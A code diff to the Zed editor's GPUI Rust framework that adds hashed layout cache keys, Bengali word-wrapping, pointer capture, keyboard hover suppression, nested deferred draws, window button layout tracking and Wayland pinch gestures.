+ glyph.position.x = glyph_pos * force_width;
+ }
+ glyph_pos += 1;
+ }
+ }
+ }
+
+ let key = Arc::new(HashedCacheKey {
+ text_hash,
+ text_len,
+ font_size,
+ runs: SmallVec::from(runs),
+ wrap_width: None,
+ force_width,
+ });
+ let layout = Arc::new(layout);
+ current_frame
+ .lines_by_hash
+ .insert(key.clone(), layout.clone());
+ current_frame.used_lines_by_hash.push(key);
+ layout
+ }
}
/// A run of text with a single font.
@@ -622,12 +825,80 @@ struct CacheKeyRef<'a> {
force_width: Option<Pixels>,
}
+#[derive(Clone, Debug)]
+struct HashedCacheKey {
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: SmallVec<[FontRun; 1]>,
+ wrap_width: Option<Pixels>,
+ force_width: Option<Pixels>,
+}
+
+#[derive(Copy, Clone)]
+struct HashedCacheKeyRef<'a> {
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &'a [FontRun],
+ wrap_width: Option<Pixels>,
+ force_width: Option<Pixels>,
+}
+
impl PartialEq for dyn AsCacheKeyRef + '_ {
fn eq(&self, other: &dyn AsCacheKeyRef) -> bool {
self.as_cache_key_ref() == other.as_cache_key_ref()
}
}
+impl PartialEq for HashedCacheKey {
+ fn eq(&self, other: &Self) -> bool {
+ self.text_hash == other.text_hash
+ && self.text_len == other.text_len
+ && self.font_size == other.font_size
+ && self.runs.as_slice() == other.runs.as_slice()
+ && self.wrap_width == other.wrap_width
+ && self.force_width == other.force_width
+ }
+}
+
+impl Eq for HashedCacheKey {}
+
+impl Hash for HashedCacheKey {
+ fn hash<H: Hasher>(&self, state: &mut H) {
+ self.text_hash.hash(state);
+ self.text_len.hash(state);
+ self.font_size.hash(state);
+ self.runs.as_slice().hash(state);
+ self.wrap_width.hash(state);
+ self.force_width.hash(state);
+ }
+}
+
+impl PartialEq for HashedCacheKeyRef<'_> {
+ fn eq(&self, other: &Self) -> bool {
+ self.text_hash == other.text_hash
+ && self.text_len == other.text_len
+ && self.font_size == other.font_size
+ && self.runs == other.runs
+ && self.wrap_width == other.wrap_width
+ && self.force_width == other.force_width
+ }
+}
+
+impl Eq for HashedCacheKeyRef<'_> {}
+
+impl Hash for HashedCacheKeyRef<'_> {
+ fn hash<H: Hasher>(&self, state: &mut H) {
+ self.text_hash.hash(state);
+ self.text_len.hash(state);
+ self.font_size.hash(state);
+ self.runs.hash(state);
+ self.wrap_width.hash(state);
+ self.force_width.hash(state);
+ }
+}
+
impl Eq for dyn AsCacheKeyRef + '_ {}
impl Hash for dyn AsCacheKeyRef + '_ {
@@ -236,10 +236,13 @@ impl LineWrapper {
matches!(c, '\u{1E00}'..='\u{1EFF}') || // Latin Extended Additional
matches!(c, '\u{0300}'..='\u{036F}') || // Combining Diacritical Marks
+ // Bengali (https://en.wikipedia.org/wiki/Bengali_(Unicode_block))
+ matches!(c, '\u{0980}'..='\u{09FF}') ||
+
// Some other known special characters that should be treated as word characters,
- // e.g. `a-b`, `var_name`, `I'm`, '@mention`, `#hashtag`, `100%`, `3.1415`,
+ // e.g. `a-b`, `var_name`, `I'm`/`won’t`, '@mention`, `#hashtag`, `100%`, `3.1415`,
// `2^3`, `a~b`, `a=1`, `Self::new`, etc.
- matches!(c, '-' | '_' | '.' | '\'' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') ||
+ matches!(c, '-' | '_' | '.' | '\'' | '’' | '‘' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') ||
// `⋯` character is special used in Zed, to keep this at the end of the line.
matches!(c, '⋯')
}
@@ -835,6 +838,8 @@ mod tests {
assert_word("a=1");
assert_word("Self::is_word_char");
assert_word("more⋯");
+ assert_word("won’t");
+ assert_word("‘twas");
// Space
assert_not_word("foo bar");
@@ -856,6 +861,10 @@ mod tests {
assert_word("АБВГДЕЖЗИЙКЛМНОП");
// Vietnamese (https://github.com/zed-industries/zed/issues/23245)
assert_word("ThậmchíđếnkhithuachạychúngcònnhẫntâmgiếtnốtsốđôngtùchínhtrịởYênBáivàCaoBằng");
+ // Bengali
+ assert_word("গিয়েছিলেন");
+ assert_word("ছেলে");
+ assert_word("হচ্ছিল");
// non-word characters
assert_not_word("你好");
@@ -560,12 +560,20 @@ pub enum WindowControlArea {
pub struct HitboxId(u64);
impl HitboxId {
- /// Checks if the hitbox with this ID is currently hovered. Except when handling
+ /// Checks if the hitbox with this ID is currently hovered. Returns `false` during keyboard
+ /// input modality so that keyboard navigation suppresses hover highlights. Except when handling
/// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse
/// events or paint hover styles.
///
/// See [`Hitbox::is_hovered`] for details.
pub fn is_hovered(self, window: &Window) -> bool {
+ // If this hitbox has captured the pointer, it's always considered hovered
+ if window.captured_hitbox == Some(self) {
+ return true;
+ }
+ if window.last_input_was_keyboard() {
+ return false;
+ }
let hit_test = &window.mouse_hit_test;
for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) {
if self == *id {
@@ -604,13 +612,15 @@ pub struct Hitbox {
}
impl Hitbox {
- /// Checks if the hitbox is currently hovered. Except when handling `ScrollWheelEvent`, this is
- /// typically what you want when determining whether to handle mouse events or paint hover
- /// styles.
+ /// Checks if the hitbox is currently hovered. Returns `false` during keyboard input modality
+ /// so that keyboard navigation suppresses hover highlights. Except when handling
+ /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse
+ /// events or paint hover styles.
///
/// This can return `false` even when the hitbox contains the mouse, if a hitbox in front of
/// this sets `HitboxBehavior::BlockMouse` (`InteractiveElement::occlude`) or
- /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`).
+ /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`),
+ /// or if the current input modality is keyboard (see [`Window::last_input_was_keyboard`]).
///
/// Handling of `ScrollWheelEvent` should typically use `should_handle_scroll` instead.
/// Concretely, this is due to use-cases like overlays that cause the elements under to be
@@ -822,6 +832,11 @@ impl Frame {
self.tab_stops.clear();
self.focus = None;
+ #[cfg(any(test, feature = "test-support"))]
+ {
+ self.debug_bounds.clear();
+ }
+
#[cfg(any(feature = "inspector", debug_assertions))]
{
self.next_inspector_instance_ids.clear();
@@ -936,6 +951,7 @@ pub struct Window {
pub(crate) bounds_observers: SubscriberSet<(), AnyObserver>,
appearance: WindowAppearance,
pub(crate) appearance_observers: SubscriberSet<(), AnyObserver>,
+ pub(crate) button_layout_observers: SubscriberSet<(), AnyObserver>,
active: Rc<Cell<bool>>,
hovered: Rc<Cell<bool>>,
pub(crate) needs_present: Rc<Cell<bool>>,
@@ -952,6 +968,9 @@ pub struct Window {
pub(crate) pending_input_observers: SubscriberSet<(), AnyObserver>,
prompt: Option<RenderablePromptHandle>,
pub(crate) client_inset: Option<Pixels>,
+ /// The hitbox that has captured the pointer, if any.
+ /// While captured, mouse events route to this hitbox regardless of hit testing.
+ captured_hitbox: Option<HitboxId>,
#[cfg(any(feature = "inspector", debug_assertions))]
inspector: Option<Entity<Inspector>>,
}
@@ -1270,6 +1289,14 @@ impl Window {
.log_err();
}
}));
+ platform_window.on_button_layout_changed(Box::new({
+ let mut cx = cx.to_async();
+ move || {
+ handle
+ .update(&mut cx, |_, window, cx| window.button_layout_changed(cx))
+ .log_err();
+ }
+ }));
platform_window.on_active_status_change(Box::new({
let mut cx = cx.to_async();
move |active| {
@@ -1424,6 +1451,7 @@ impl Window {
bounds_observers: SubscriberSet::new(),
appearance,
appearance_observers: SubscriberSet::new(),
+ button_layout_observers: SubscriberSet::new(),
active,
hovered,
needs_present,
@@ -1439,6 +1467,7 @@ impl Window {
prompt: None,
client_inset: None,
image_cache_stack: Vec::new(),
+ captured_hitbox: None,
#[cfg(any(feature = "inspector", debug_assertions))]
inspector: None,
})
@@ -1515,6 +1544,22 @@ impl Window {
subscription
}
+ /// Registers a callback to be invoked when the window button layout changes.
+ pub fn observe_button_layout_changed(
+ &self,
+ mut callback: impl FnMut(&mut Window, &mut App) + 'static,
+ ) -> Subscription {
+ let (subscription, activate) = self.button_layout_observers.insert(
+ (),
+ Box::new(move |window, cx| {
+ callback(window, cx);
+ true
+ }),
+ );
+ activate();
+ subscription
+ }
+
/// Replaces the root entity of the window with a new one.
pub fn replace_root<E>(
&mut self,
@@ -1888,7 +1933,12 @@ impl Window {
})
}
- fn bounds_changed(&mut self, cx: &mut App) {
+ /// Notify the window that its bounds have changed.
+ ///
+ /// This updates internal state like `viewport_size` and `scale_factor` from
+ /// the platform window, then notifies observers. Normally called automatically
+ /// by the platform's resize callback, but exposed publicly for test infrastructure.
+ pub fn bounds_changed(&mut self, cx: &mut App) {
self.scale_factor = self.platform_window.scale_factor();
self.viewport_size = self.platform_window.content_size();
self.display_id = self.platform_window.display().map(|display| display.id());
@@ -1932,6 +1982,12 @@ impl Window {
.retain(&(), |callback| callback(self, cx));
}
+ pub(crate) fn button_layout_changed(&mut self, cx: &mut App) {
+ self.button_layout_observers
+ .clone()
+ .retain(&(), |callback| callback(self, cx));
+ }
+
/// Returns the appearance of the current window.
pub fn appearance(&self) -> WindowAppearance {
self.appearance
@@ -2144,6 +2200,26 @@ impl Window {
self.mouse_position
}
+ /// Captures the pointer for the given hitbox. While captured, all mouse move and mouse up
+ /// events will be routed to listeners that check this hitbox's `is_hovered` status,
+ /// regardless of actual hit testing. This enables drag operations that continue
+ /// even when the pointer moves outside the element's bounds.
+ ///
+ /// The capture is automatically released on mouse up.
+ pub fn capture_pointer(&mut self, hitbox_id: HitboxId) {
+ self.captured_hitbox = Some(hitbox_id);
+ }
+
+ /// Releases any active pointer capture.
+ pub fn release_pointer(&mut self) {
+ self.captured_hitbox = None;
+ }
+
+ /// Returns the hitbox that has captured the pointer, if any.
+ pub fn captured_hitbox(&self) -> Option<HitboxId> {
+ self.captured_hitbox
+ }
+
/// The current state of the keyboard's modifiers
pub fn modifiers(&self) -> Modifiers {
self.modifiers
@@ -2300,10 +2376,7 @@ impl Window {
#[cfg(any(feature = "inspector", debug_assertions))]
let inspector_element = self.prepaint_inspector(_inspector_width, cx);
- let mut sorted_deferred_draws =
- (0..self.next_frame.deferred_draws.len()).collect::<SmallVec<[_; 8]>>();
- sorted_deferred_draws.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority);
- self.prepaint_deferred_draws(&sorted_deferred_draws, cx);
+ self.prepaint_deferred_draws(cx);
let mut prompt_element = None;
let mut active_drag_element = None;
@@ -2332,7 +2405,7 @@ impl Window {
#[cfg(any(feature = "inspector", debug_assertions))]
self.paint_inspector(inspector_element, cx);
- self.paint_deferred_draws(&sorted_deferred_draws, cx);
+ self.paint_deferred_draws(cx);
if let Some(mut prompt_element) = prompt_element {
prompt_element.paint(self, cx);
@@ -2415,25 +2488,40 @@ impl Window {
None
}
- fn prepaint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) {
+ fn prepaint_deferred_draws(&mut self, cx: &mut App) {
assert_eq!(self.element_id_stack.len(), 0);
- let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
- for deferred_draw_ix in deferred_draw_indices {
- let deferred_draw = &mut deferred_draws[*deferred_draw_ix];
- self.element_id_stack
- .clone_from(&deferred_draw.element_id_stack);
- self.text_style_stack
- .clone_from(&deferred_draw.text_style_stack);
- self.next_frame
- .dispatch_tree
- .set_active_node(deferred_draw.parent_node);
+ let mut completed_draws = Vec::new();
+
+ // Process deferred draws in multiple rounds to support nesting.
+ // Each round processes all current deferred draws, which may produce new ones.
+ let mut depth = 0;
+ loop {
+ // Limit maximum nesting depth to prevent infinite loops.
+ assert!(depth < 10, "Exceeded maximum (10) deferred depth");
+ depth += 1;
+ let deferred_count = self.next_frame.deferred_draws.len();
+ if deferred_count == 0 {
+ break;
+ }
- let prepaint_start = self.prepaint_index();
- let content_mask = deferred_draw.content_mask.clone();
- if let Some(element) = deferred_draw.element.as_mut() {
- self.with_rendered_view(deferred_draw.current_view, |window| {
- window.with_content_mask(content_mask, |window| {
+ // Sort by priority for this round
+ let traversal_order = self.deferred_draw_traversal_order();
+ let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
+
+ for deferred_draw_ix in traversal_order {
+ let deferred_draw = &mut deferred_draws[deferred_draw_ix];
+ self.element_id_stack
+ .clone_from(&deferred_draw.element_id_stack);
+ self.text_style_stack
+ .clone_from(&deferred_draw.text_style_stack);
+ self.next_frame
+ .dispatch_tree
+ .set_active_node(deferred_draw.parent_node);
+
+ let prepaint_start = self.prepaint_index();
+ if let Some(element) = deferred_draw.element.as_mut() {
+ self.with_rendered_view(deferred_draw.current_view, |window| {
window.with_rem_size(Some(deferred_draw.rem_size), |window| {
window.with_absolute_element_offset(
deferred_draw.absolute_offset,
@@ -2442,30 +2530,38 @@ impl Window {
},
);
});
- });
- })
- } else {
- self.reuse_prepaint(deferred_draw.prepaint_range.clone());
+ })
+ } else {
+ self.reuse_prepaint(deferred_draw.prepaint_range.clone());
+ }
+ let prepaint_end = self.prepaint_index();
+ deferred_draw.prepaint_range = prepaint_start..prepaint_end;
}
- let prepaint_end = self.prepaint_index();
- deferred_draw.prepaint_range = prepaint_start..prepaint_end;
+
+ // Save completed draws and continue with newly added ones
+ completed_draws.append(&mut deferred_draws);
+
+ self.element_id_stack.clear();
+ self.text_style_stack.clear();
}
- assert_eq!(
- self.next_frame.deferred_draws.len(),
- 0,
- "cannot call defer_draw during deferred drawing"
- );
- self.next_frame.deferred_draws = deferred_draws;
- self.element_id_stack.clear();
- self.text_style_stack.clear();
+
+ // Restore all completed draws
+ self.next_frame.deferred_draws = completed_draws;
}
- fn paint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) {
+ fn paint_deferred_draws(&mut self, cx: &mut App) {
assert_eq!(self.element_id_stack.len(), 0);
+ // Paint all deferred draws in priority order.
+ // Since prepaint has already processed nested deferreds, we just paint them all.
+ if self.next_frame.deferred_draws.len() == 0 {
+ return;
+ }
+
+ let traversal_order = self.deferred_draw_traversal_order();
let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws);
- for deferred_draw_ix in deferred_draw_indices {
- let mut deferred_draw = &mut deferred_draws[*deferred_draw_ix];
+ for deferred_draw_ix in traversal_order {
+ let mut deferred_draw = &mut deferred_draws[deferred_draw_ix];
self.element_id_stack
.clone_from(&deferred_draw.element_id_stack);
self.next_frame
@@ -2492,6 +2588,13 @@ impl Window {
self.element_id_stack.clear();
}
+ fn deferred_draw_traversal_order(&mut self) -> SmallVec<[usize; 8]> {
+ let deferred_count = self.next_frame.deferred_draws.len();
+ let mut sorted_indices = (0..deferred_count).collect::<SmallVec<[_; 8]>>();
+ sorted_indices.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority);
+ sorted_indices
+ }
+
pub(crate) fn prepaint_index(&self) -> PrepaintStateIndex {
PrepaintStateIndex {
hitboxes_index: self.next_frame.hitboxes.len(),
@@ -3295,6 +3398,100 @@ impl Window {
Ok(())
}
+ /// Paints a monochrome glyph with pre-computed raster bounds.
+ ///
+ /// This is faster than `paint_glyph` because it skips the per-glyph cache lookup.
+ /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint.
+ pub fn paint_glyph_with_raster_bounds(
+ &mut self,
+ origin: Point<Pixels>,
+ _font_id: FontId,
+ _glyph_id: GlyphId,
+ _font_size: Pixels,
+ color: Hsla,
+ raster_bounds: Bounds<DevicePixels>,
+ params: &RenderGlyphParams,
+ ) -> Result<()> {
+ self.invalidator.debug_assert_paint();
+
+ let element_opacity = self.element_opacity();
+ let scale_factor = self.scale_factor();
+ let glyph_origin = origin.scale(scale_factor);
+
+ if !raster_bounds.is_zero() {
+ let tile = self
+ .sprite_atlas
+ .get_or_insert_with(¶ms.clone().into(), &mut || {
+ let (size, bytes) = self.text_system().rasterize_glyph(params)?;
+ Ok(Some((size, Cow::Owned(bytes))))
+ })?
+ .expect("Callback above only errors or returns Some");
+ let bounds = Bounds {
+ origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into),
+ size: tile.bounds.size.map(Into::into),
+ };
+ let content_mask = self.content_mask().scale(scale_factor);
+ self.next_frame.scene.insert_primitive(MonochromeSprite {
+ order: 0,
+ pad: 0,
+ bounds,
+ content_mask,
+ color: color.opacity(element_opacity),
+ tile,
+ transformation: TransformationMatrix::unit(),
+ });
+ }
+ Ok(())
+ }
+
+ /// Paints an emoji glyph with pre-computed raster bounds.
+ ///
+ /// This is faster than `paint_emoji` because it skips the per-glyph cache lookup.
+ /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint.
+ pub fn paint_emoji_with_raster_bounds(
+ &mut self,
+ origin: Point<Pixels>,
+ _font_id: FontId,
+ _glyph_id: GlyphId,
+ _font_size: Pixels,
+ raster_bounds: Bounds<DevicePixels>,
+ params: &RenderGlyphParams,
+ ) -> Result<()> {
+ self.invalidator.debug_assert_paint();
+
+ let scale_factor = self.scale_factor();
+ let glyph_origin = origin.scale(scale_factor);
+
+ if !raster_bounds.is_zero() {
+ let tile = self
+ .sprite_atlas
+ .get_or_insert_with(¶ms.clone().into(), &mut || {
+ let (size, bytes) = self.text_system().rasterize_glyph(params)?;
+ Ok(Some((size, Cow::Owned(bytes))))
+ })?
+ .expect("Callback above only errors or returns Some");
+
+ let bounds = Bounds {
+ origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into),
+ size: tile.bounds.size.map(Into::into),
+ };
+ let content_mask = self.content_mask().scale(scale_factor);
+ let opacity = self.element_opacity();
+
+ self.next_frame.scene.insert_primitive(PolychromeSprite {
+ order: 0,
+ pad: 0,
+ grayscale: false,
+ bounds,
+ corner_radii: Default::default(),
+ content_mask,
+ tile,
+ opacity,
+ });
+ }
+ Ok(())
+ }
+
fn should_use_subpixel_rendering(&self, font_id: FontId, font_size: Pixels) -> bool {
if self.platform_window.background_appearance() != WindowBackgroundAppearance::Opaque {
return false;
@@ -3896,14 +4093,18 @@ impl Window {
/// Dispatch a mouse or keyboard event on the window.
#[profiling::function]
pub fn dispatch_event(&mut self, event: PlatformInput, cx: &mut App) -> DispatchEventResult {
- // Track whether this input was keyboard-based for focus-visible styling
+ // Track input modality for focus-visible styling and hover suppression.
+ // Hover is suppressed during keyboard modality so that keyboard navigation
+ // doesn't show hover highlights on the item under the mouse cursor.
+ let old_modality = self.last_input_modality;
self.last_input_modality = match &event {
- PlatformInput::KeyDown(_) | PlatformInput::ModifiersChanged(_) => {
- InputModality::Keyboard
- }
- PlatformInput::MouseDown(e) if e.is_focusing() => InputModality::Mouse,
+ PlatformInput::KeyDown(_) => InputModality::Keyboard,
+ PlatformInput::MouseMove(_) | PlatformInput::MouseDown(_) => InputModality::Mouse,
_ => self.last_input_modality,
};
+ if self.last_input_modality != old_modality {
+ self.refresh();
+ }
// Handlers may set this to false by calling `stop_propagation`.
cx.propagate_event = true;
@@ -3945,6 +4146,12 @@ impl Window {
self.modifiers = scroll_wheel.modifiers;
PlatformInput::ScrollWheel(scroll_wheel)
}
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ PlatformInput::Pinch(pinch) => {
+ self.mouse_position = pinch.position;
+ self.modifiers = pinch.modifiers;
+ PlatformInput::Pinch(pinch)
+ }
// Translate dragging and dropping of external files from the operating system
// to internal drag and drop events.
PlatformInput::FileDrop(file_drop) => match file_drop {
@@ -4057,6 +4264,11 @@ impl Window {
self.refresh();
}
}
+
+ // Auto-release pointer capture on mouse up
+ if event.is::<MouseUpEvent>() && self.captured_hitbox.is_some() {
+ self.captured_hitbox = None;
+ }
}
fn dispatch_key_event(&mut self, event: &dyn Any, cx: &mut App) {
@@ -26,7 +26,8 @@ use gpui::{
Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DisplayId,
ForegroundExecutor, Keymap, Menu, MenuItem, OwnedMenu, PathPromptOptions, Platform,
PlatformDisplay, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem,
- PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, WindowParams,
+ PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance,
+ WindowButtonLayout, WindowParams,
};
#[cfg(any(feature = "wayland", feature = "x11"))]
use gpui::{Pixels, Point, px};
@@ -57,7 +58,7 @@ pub(crate) trait LinuxClient {
#[cfg(feature = "screen-capture")]
fn is_screen_capture_supported(&self) -> bool {
- false
+ true
}
#[cfg(feature = "screen-capture")]
@@ -114,6 +115,7 @@ pub(crate) struct LinuxCommon {
pub(crate) text_system: Arc<dyn PlatformTextSystem>,
pub(crate) appearance: WindowAppearance,
pub(crate) auto_hide_scrollbars: bool,
+ pub(crate) button_layout: WindowButtonLayout,
pub(crate) callbacks: PlatformHandlers,
pub(crate) signal: LoopSignal,
pub(crate) menus: Vec<OwnedMenu>,
@@ -140,6 +142,7 @@ impl LinuxCommon {
text_system,
appearance: WindowAppearance::Light,
auto_hide_scrollbars: false,
+ button_layout: WindowButtonLayout::linux_default(),
callbacks,
signal,
menus: Vec::new(),
@@ -601,6 +604,10 @@ impl<P: LinuxClient + 'static> Platform for LinuxPlatform<P> {
self.inner.with_common(|common| common.appearance)
}
+ fn button_layout(&self) -> Option<WindowButtonLayout> {
+ Some(self.inner.with_common(|common| common.button_layout))
+ }
+
fn register_url_scheme(&self, _: &str) -> Task<anyhow::Result<()>> {
Task::ready(Err(anyhow!("register_url_scheme unimplemented")))
}
@@ -633,28 +640,42 @@ pub(super) fn open_uri_internal(
if let Some(uri) = ashpd::Uri::parse(uri).log_err() {
executor
.spawn(async move {
- match ashpd::desktop::open_uri::OpenFileRequest::default()
- .activation_token(activation_token.clone().map(ashpd::ActivationToken::from))
- .send_uri(&uri)
- .await
- .and_then(|e| e.response())
- {
- Ok(()) => return,
- Err(e) => log::error!("Failed to open with dbus: {}", e),
- }
-
+ let mut xdg_open_failed = false;
for mut command in open::commands(uri.to_string()) {
if let Some(token) = activation_token.as_ref() {
command.env("XDG_ACTIVATION_TOKEN", token);
}
let program = format!("{:?}", command.get_program());
match smol::process::Command::from(command).spawn() {
- Ok(mut cmd) => {
- cmd.status().await.log_err();
- return;
+ Ok(mut cmd) => match cmd.status().await {
+ Ok(status) if status.success() => return,
+ Ok(status) => {
+ log::error!("Command {} exited with status: {}", program, status);
+ xdg_open_failed = true;
+ }
+ Err(e) => {
+ log::error!("Failed to get status from {}: {}", program, e);
+ xdg_open_failed = true;
+ }
+ },
+ Err(e) => {
+ log::error!("Failed to open with {}: {}", program, e);
+ xdg_open_failed = true;
}
+ }
+ }
+
+ if xdg_open_failed {
+ match ashpd::desktop::open_uri::OpenFileRequest::default()
+ .activation_token(activation_token.map(ashpd::ActivationToken::from))
+ .send_uri(&uri)
+ .await
+ .and_then(|e| e.response())
+ {
+ Ok(()) => {}
+ Err(ashpd::Error::Response(ashpd::desktop::ResponseError::Cancelled)) => {}
Err(e) => {
- log::error!("Failed to open with {}: {}", program, e)
+ log::error!("Failed to open with dbus: {}", e);
}
}
}
@@ -36,6 +36,9 @@ use wayland_client::{
wl_shm_pool, wl_surface,
},
};
+use wayland_protocols::wp::pointer_gestures::zv1::client::{
+ zwp_pointer_gesture_pinch_v1, zwp_pointer_gestures_v1,
+};
use wayland_protocols::wp::primary_selection::zv1::client::zwp_primary_selection_offer_v1::{
self, ZwpPrimarySelectionOfferV1,
};
@@ -92,8 +95,8 @@ use gpui::{
ForegroundExecutor, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent,
MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MouseUpEvent, NavigationDirection,
Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point,
- ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowParams, point,
- profiler, px, size,
+ ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowButtonLayout,
+ WindowParams, point, profiler, px, size,
};
use gpui_wgpu::{CompositorGpuHint, GpuContext};
use wayland_protocols::wp::linux_dmabuf::zv1::client::{
@@ -124,6 +127,7 @@ pub struct Globals {
pub layer_shell: Option<zwlr_layer_shell_v1::ZwlrLayerShellV1>,
pub blur_manager: Option<org_kde_kwin_blur_manager::OrgKdeKwinBlurManager>,
pub text_input_manager: Option<zwp_text_input_manager_v3::ZwpTextInputManagerV3>,
+ pub gesture_manager: Option<zwp_pointer_gestures_v1::ZwpPointerGesturesV1>,
pub dialog: Option<xdg_wm_dialog_v1::XdgWmDialogV1>,
pub executor: ForegroundExecutor,
}
@@ -164,6 +168,7 @@ impl Globals {
layer_shell: globals.bind(&qh, 1..=5, ()).ok(),
blur_manager: globals.bind(&qh, 1..=1, ()).ok(),
text_input_manager: globals.bind(&qh, 1..=1, ()).ok(),
+ gesture_manager: globals.bind(&qh, 1..=3, ()).ok(),
dialog: globals.bind(&qh, dialog_v..=dialog_v, ()).ok(),
executor,
qh,
@@ -208,6 +213,8 @@ pub(crate) struct WaylandClientState {
pub compositor_gpu: Option<CompositorGpuHint>,
wl_seat: wl_seat::WlSeat, // TODO: Multi seat support
wl_pointer: Option<wl_pointer::WlPointer>,
+ pinch_gesture: Option<zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1>,
+ pinch_scale: f32,
wl_keyboard: Option<wl_keyboard::WlKeyboard>,
cursor_shape_device: Option<wp_cursor_shape_device_v1::WpCursorShapeDeviceV1>,
data_device: Option<wl_data_device::WlDataDevice>,
@@ -560,6 +567,19 @@ impl WaylandClient {
}
}
}
+ XDPEvent::ButtonLayout(layout_str) => {
+ if let Some(client) = client.0.upgrade() {
+ let layout = WindowButtonLayout::parse(&layout_str)
+ .log_err()
+ .unwrap_or_else(WindowButtonLayout::linux_default);
+ let mut client = client.borrow_mut();
+ client.common.button_layout = layout;
+
+ for window in client.windows.values_mut() {
+ window.set_button_layout();
+ }
+ }
+ }
XDPEvent::CursorTheme(theme) => {
if let Some(client) = client.0.upgrade() {
let mut client = client.borrow_mut();
@@ -584,6 +604,8 @@ impl WaylandClient {
wl_seat: seat,
wl_pointer: None,
wl_keyboard: None,
+ pinch_gesture: None,
+ pinch_scale: 1.0,
cursor_shape_device: None,
data_device,
primary_selection,
@@ -693,11 +715,6 @@ impl LinuxClient for WaylandClient {
None
}
- #[cfg(feature = "screen-capture")]
- fn is_screen_capture_supported(&self) -> bool {
- false
- }
-
#[cfg(feature = "screen-capture")]
fn screen_capture_sources(
&self,
@@ -1325,6 +1342,12 @@ impl Dispatch<wl_seat::WlSeat, ()> for WaylandClientStatePtr {
.as_ref()
.map(|cursor_shape_manager| cursor_shape_manager.get_pointer(&pointer, qh, ()));
+ state.pinch_gesture = state.globals.gesture_manager.as_ref().map(
+ |gesture_manager: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1| {
+ gesture_manager.get_pinch_gesture(&pointer, qh, ())
+ },
+ );
+
if let Some(wl_pointer) = &state.wl_pointer {
wl_pointer.release();
}
@@ -1998,6 +2021,91 @@ impl Dispatch<wl_pointer::WlPointer, ()> for WaylandClientStatePtr {
}
}
+impl Dispatch<zwp_pointer_gestures_v1::ZwpPointerGesturesV1, ()> for WaylandClientStatePtr {
+ fn event(
+ _this: &mut Self,
+ _: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1,
+ _: <zwp_pointer_gestures_v1::ZwpPointerGesturesV1 as Proxy>::Event,
+ _: &(),
+ _: &Connection,
+ _: &QueueHandle<Self>,
+ ) {
+ // The gesture manager doesn't generate events
+ }
+}
+
+impl Dispatch<zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1, ()>
+ for WaylandClientStatePtr
+{
+ fn event(
+ this: &mut Self,
+ _: &zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1,
+ event: <zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1 as Proxy>::Event,
+ _: &(),
+ _: &Connection,
+ _: &QueueHandle<Self>,
+ ) {
+ use gpui::PinchEvent;
+
+ let client = this.get_client();
+ let mut state = client.borrow_mut();
+
+ let Some(window) = state.mouse_focused_window.clone() else {
+ return;
+ };
+
+ match event {
+ zwp_pointer_gesture_pinch_v1::Event::Begin {
+ serial: _,
+ time: _,
+ surface: _,
+ fingers: _,
+ } => {
+ state.pinch_scale = 1.0;
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: 0.0,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Started,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ zwp_pointer_gesture_pinch_v1::Event::Update { time: _, scale, .. } => {
+ let new_absolute_scale = scale as f32;
+ let previous_scale = state.pinch_scale;
+ let zoom_delta = new_absolute_scale - previous_scale;
+ state.pinch_scale = new_absolute_scale;
+
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: zoom_delta,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Moved,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ zwp_pointer_gesture_pinch_v1::Event::End {
+ serial: _,
+ time: _,
+ cancelled: _,
+ } => {
+ state.pinch_scale = 1.0;
+ let input = PlatformInput::Pinch(PinchEvent {
+ position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))),
+ delta: 0.0,
+ modifiers: state.modifiers,
+ phase: TouchPhase::Ended,
+ });
+ drop(state);
+ window.handle_input(input);
+ }
+ _ => {}
+ }
+ }
+}
+
impl Dispatch<wp_fractional_scale_v1::WpFractionalScaleV1, ObjectId> for WaylandClientStatePtr {
fn event(
